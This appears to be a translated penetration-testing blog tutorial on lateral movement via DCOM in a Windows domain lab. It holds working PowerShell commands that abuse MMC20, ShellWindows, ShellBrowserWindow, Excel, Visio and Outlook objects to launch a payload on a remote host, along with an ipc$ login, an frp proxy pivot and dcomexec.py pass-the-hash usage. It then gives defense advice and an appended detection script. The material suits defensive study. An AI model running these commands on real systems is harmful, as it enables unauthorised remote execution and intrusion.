
Lateral Movement via DCOM in Intranet Penetration

2022-06-24 01:30:00 Gh0st1nTheShel

**Welcome to follow my WeChat official account: "The Soul in the Shell"**

COM

The Component Object Model (COM) is a set of component object interface standards built on the Windows platform, consisting of a set of construction specifications and a component object library. COM is the foundation of many Microsoft products and technologies, such as Windows Media Player and Windows Server.

Ordinary objects consist of data members and the methods that act on them. Component objects resemble ordinary objects but differ in one important way: a component object describes itself not through methods but through interfaces. An interface is defined as "a set of semantically related functions implemented on an object"; in essence it is a table of function pointers, each of which must be initialized to a specific function body. There is no limit on the number of interfaces a component object may implement.

Using DCOM on remote systems

DCOM (Distributed Component Object Model) is a set of Microsoft concepts and program interfaces. It supports communication between components on two different machines, whether they are on a LAN, a WAN, or the Internet. Using this interface, a client program object can send requests to a server program object on another computer in the network.

COM provides a set of interfaces that allow clients and servers on the same computer to communicate (on Windows 95 and later versions of the operating system). DCOM is an extension of COM that lets applications instantiate and access the properties and methods of COM objects on remote computers. DCOM uses remote procedure call (RPC) technology to extend COM functionality beyond the local computer, so COM server software hosted on a remote system (usually in a DLL or exe) can expose its methods to clients over RPC.

When an attacker moves laterally and wants to execute a command or payload on a remote system, besides being able to execute commands remotely with at, schtasks, PsExec, WMI, smbexec, PowerShell, Office applications and other Windows objects that contain unsafe methods, they must also deal with the many devices deployed in the network environment, such as IPS and traffic-analysis systems. Understanding the methods of lateral movement is of great benefit to day-to-day system security maintenance.

One advantage of lateral movement via DCOM is that the process executed on the remote host is managed by the COM server software. For example, if we abuse the ShellBrowserWindow COM object, execution happens inside the existing explorer.exe process on the remote host. For the attacker this undoubtedly improves stealth: since a great many programs expose methods over DCOM, it can be hard for defenders to fully monitor the execution of all of them.

Executing commands via local DCOM

1. Obtain the DCOM list

There are two commands. The first requires PowerShell 3.0 or later, i.e. Windows Server 2012 and above:

Get-CimInstance Win32_DCOMApplication
Get-CimInstance -Class Win32_DCOMApplication | select appid,name

The other command also works with PowerShell 2.0:

Get-WmiObject -Namespace ROOT\CIMV2 -Class Win32_DCOMApplication 

(Screenshots: output on Windows 7 and on Windows Server 2012)

In fact, many articles online first obtain the DCOM list and then use MMC20 and so on. Thinking about it, the step of querying DCOM is really of little use. I guess the purpose of querying the DCOM list is to find a suitable DCOM component and then check whether it has command execution or some other function, but I cannot obtain the CLSID or ProgID from the DCOM query, so I cannot judge what functions a DCOM component can perform.

2. Use DCOM to execute arbitrary commands

First of all, you need an administrator shell. Without administrator rights, the following happens (see screenshot):

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1")) 

This command obtains an instance of the COM object. If it succeeds, you can inspect the available members with:

$com.Document.ActiveView | Get-Member 

You can see a method that executes a command:

$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimized")

If it executes successfully, the calculator (calc.exe) opens. Replacing that program with a malicious payload turns this into an attack.

(Screenshots: result on Windows 7 and on Windows 10)

Besides MMC20.Application, objects such as ShellWindows, ShellBrowserWindow, Excel.Application and Outlook.Application can also be used.

Above we ran the local "Calculator" program through the ExecuteShellCommand method of MMC20.Application. If we supply the IP of a remote host instead, we can use

[activator]::CreateInstance([type]::GetTypeFromProgID(ProgID,IP))
[Activator]::CreateInstance([Type]::GetTypeFromCLSID(CLSID,IP))

to interact with the remote DCOM object through PowerShell. Supplying the DCOM ProgID and the other host's IP address yields an instance of that DCOM object on the other host, and the ExecuteShellCommand method of that DCOM application can then be used to execute commands on the target. If the attacker swaps the "Calculator" program for a malicious payload, it poses a threat to system security.

Using DCOM to execute commands on a remote host

Prerequisites:

1. The system firewall must be turned off.

2. You must have administrator privileges.

Test environment:

Attacker: kali: 192.168.200.4

Domain environment: win7: 10.10.10.17, 192.168.200.22; windows server: 10.10.10.12

1. Take control of win7

Assume win7 has already been compromised and is used as a pivot; bounce a shell back to msf.

Load the powershell extension so that powershell commands can be used.

2. Connect to the remote host via ipc$

To upload files to the target machine over IPC, the connection must be established as a user with administrator privileges:

net use \\10.10.10.12 "Gh0st1nTheShell" /user:g1ts.com\testuser 

3. Upload the backdoor to the target host

Use the copy command:

copy [file path] [target path] 

4. Execute commands

(1) Call MMC20.Application to execute a command remotely

$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.12"))
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c C:\hhh.exe","Minimized")

You can see that on success a new shell is returned.

(2) Call CLSID 9BA05972-F6A8-11CF-A442-00A0C90A8F39 (ShellWindows)

$com = [Type]::GetTypeFromCLSID('9BA05972-F6A8-11CF-A442-00A0C90A8F39',"10.10.10.12")
$obj = [System.Activator]::CreateInstance($com)
$item = $obj.item()
$item.Document.Application.ShellExecute("cmd.exe", "/c c:\hhh.exe","c:\windows\system32",$null, 0)

The second method also works.

Both methods above apply to systems from Windows 7 through Windows 10 and from Windows Server 2008 through Windows Server 2016.

The command executes successfully regardless of whether an ipc connection was established in advance: you do not need the other host's credentials, only administrator permission on the current host.

Call Excel.Application to execute a command remotely

# Interact with DCOM remotely through PowerShell and create an instance of the Excel.Application object:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application","10.10.10.12"))
$com.DisplayAlerts = $false
# Then run the following command; the object's "DDEInitiate" method can be called to start a process on the remote host:
$com.DDEInitiate("cmd.exe","/c C:\hhh.exe")

But I failed to run it.

Call ShellBrowserWindow to execute a command remotely

Applies to Windows 10, Windows Server 2012 R2 and other versions.

# Interact with DCOM remotely through PowerShell and create an instance of the ShellBrowserWindow object by CLSID:
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("C08AFD90-F2A1-11D1-8455-00A0C91F3880","10.10.10.12"))
# Then run the following command; the object's "shellExecute" method can be called to start a process on the remote host:
$com.Document.Application.shellExecute("C:\hhh.exe")

Launched successfully.

Call Visio.Application to execute a command remotely

Applicable condition: the target host has Visio installed.

# Interact with DCOM remotely through PowerShell and create an instance of the Visio.Application object:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("Visio.Application","10.10.10.12"))
# Then run the following command; the object's "shellExecute" method can be called to start a process on the remote host:
$com[0].Document.Application.shellExecute("c:\hhh.exe")

Call Outlook.Application to execute a command remotely

Applicable condition: the target host has Outlook installed.

A Shell.Application object is created through Outlook to achieve command-line execution.

# Interact with DCOM remotely through PowerShell and create an instance of the Outlook.Application object:
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("Outlook.Application","10.10.10.12"))
# Then run the following command, which creates a Shell.Application object through Outlook and executes the command:
$com.createObject("Shell.Application").shellExecute("C:\hhh.exe")

Impacket -- dcomexec.py

First create a socks5 proxy using frp.

The frpc and frps configurations are as follows; the frps address is 192.168.200.4.

frps:
[common]
bind_port = 7000

frpc:
[common]
server_addr = 192.168.200.4
server_port = 7000

[plugin_socks5]
type = tcp
remote_port = 6000
plugin = socks5

Then configure proxychains: add the proxy at the end of /etc/proxychains4.conf.

Then prefix the command with proxychains:

python3 ./dcomexec.py [domain/]username:password@ip            // create an interactive shell
python3 ./dcomexec.py [domain/]username:password@ip command    // execute a command

If there is no cleartext password, a hash can be used instead:

python3 ./dcomexec.py [domain/]username:@ip -hashes [hash] 

Notes

1. The user information entered must correspond to the currently logged-in user. For example, if I am currently logged in as administrator and I enter testuser, then even if it passes authentication it cannot execute commands or return a shell.

2. The logged-in user needs to be an administrator. A common domain user will be rejected for lack of permission.

More methods

https://www.anquanke.com/post/id/215960

How to use derived functions and exposed DCOM interfaces for lateral movement - Anquanke, security information platform (anquanke.com)

Lateral movement does not have to involve executing a command; there are other ways to achieve the same effect, and they call for the attacker's creativity.

Defense advice

Vendors

1. Make sure that legacy DCOM registry entries are deleted when a utility is uninstalled;

2. Do not create DCOM program paths in the registry that point to a binary that does not exist.

Network defenders

1. Overall, defenders should read carefully the suggestions given in the blogs of @enigma0x3 and @PhilipTsukerman and collect the relevant IOCs in a targeted way;

2. Using these DCOM methods (usually) requires privileged access to the remote host. Protect domain accounts with elevated permissions and avoid reusing password credentials across local host accounts;

3. Ensure that defense-in-depth controls, host-based security products and host monitoring are deployed so that detection and blocking can be active. Enabling a host-based firewall can prevent RPC/DCOM interaction and instantiation;

4. Monitor file systems (and the registry), focusing on new elements and changes;

5. Monitor suspicious PowerShell activity in the environment. If possible, enforce PowerShell's "Constrained Language Mode" (this may be difficult for privileged accounts);

6. When a DCOM call "fails", the System log on the target host records an event with ID 10010 (Error, DistributedCOM) that includes the CLSID.
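As an added example that is not part of the original post, the following Python script runs the detection ideas from points 3 to 6 over constructed event records: a System-log Event ID 10010 record carrying one of the CLSIDs used on this page, and process-creation records in a Sysmon Event ID 1 shape. The record format, host names and the mapping of MMC20.Application to mmc.exe are assumptions; the "-Embedding" switch is what COM passes when it launches a server executable itself, so its absence (as with the explorer.exe-hosted ShellBrowserWindow case above) is handled as the weaker, interactive-looking signal.

```python
import ntpath

# CLSIDs abused in the post (MMC20.Application's CLSID is not given on the page,
# so that object is caught through its host process mmc.exe instead).
WATCHED_CLSIDS = {
    "9BA05972-F6A8-11CF-A442-00A0C90A8F39": "ShellWindows",
    "C08AFD90-F2A1-11D1-8455-00A0C91F3880": "ShellBrowserWindow",
}
# COM server processes hosting the objects used above (mmc.exe for MMC20 is an
# assumption; the others follow from the ProgIDs in the post).
DCOM_HOSTS = {"mmc.exe", "explorer.exe", "excel.exe", "visio.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}

def parse_record(line):
    """Parse one constructed 'key=value|key=value' record into a dict."""
    return dict(kv.split("=", 1) for kv in line.strip().split("|") if "=" in kv)

def check_record(rec):
    """Return a finding string for one record, or None if nothing matches."""
    if rec.get("log") == "System" and rec.get("id") == "10010":
        clsid = rec.get("clsid", "").strip("{}").upper()
        if clsid in WATCHED_CLSIDS:
            return f"DCOM 10010 for {WATCHED_CLSIDS[clsid]} on {rec.get('host')}"
        return None
    if rec.get("id") == "1":  # Sysmon process-creation shape (assumed field names)
        parent = ntpath.basename(rec.get("parent", "")).lower()
        child = ntpath.basename(rec.get("image", "")).lower()
        if parent in DCOM_HOSTS and child in SHELLS:
            # COM appends "-Embedding" when it starts a LocalServer32 itself, so a
            # shell under such a parent came from a COM activation, not a user.
            com_started = "-embedding" in rec.get("parent_cmdline", "").lower()
            via = "COM-activated" if com_started else "interactive"
            return f"{child} spawned by {via} {parent} on {rec.get('host')}: {rec.get('cmdline')}"
    return None

def scan(lines):
    """Run every record through check_record and keep the findings."""
    return [f for f in (check_record(parse_record(l)) for l in lines) if f]

# Constructed sample records (not real telemetry) mirroring the post's techniques.
SAMPLE = [
    "log=System|id=10010|host=WIN-SRV|clsid={C08AFD90-F2A1-11D1-8455-00A0C91F3880}",
    "log=Sysmon|id=1|host=WIN-SRV|parent=C:\\Windows\\System32\\mmc.exe|parent_cmdline=mmc.exe -Embedding"
    "|image=C:\\Windows\\System32\\cmd.exe|cmdline=cmd.exe /c C:\\hhh.exe",
    "log=Sysmon|id=1|host=WIN-SRV|parent=C:\\Windows\\explorer.exe|parent_cmdline=explorer.exe"
    "|image=C:\\Windows\\notepad.exe|cmdline=notepad.exe",
    "log=System|id=10010|host=WIN-SRV|clsid={00000000-0000-0000-0000-000000000000}",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

The explorer.exe case only triggers when a shell is the child, which matches the post's observation that ShellBrowserWindow runs inside the user's existing explorer.exe without a fresh, COM-started parent.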

Reference article: How to achieve lateral movement with DCOM - FreeBuf, network security industry portal

Original site

Copyright notice
This article was written by [Gh0st1nTheShel]; please include the original link when reposting. Thanks.
https://yzsam.com/2021/11/20211117203913379x.html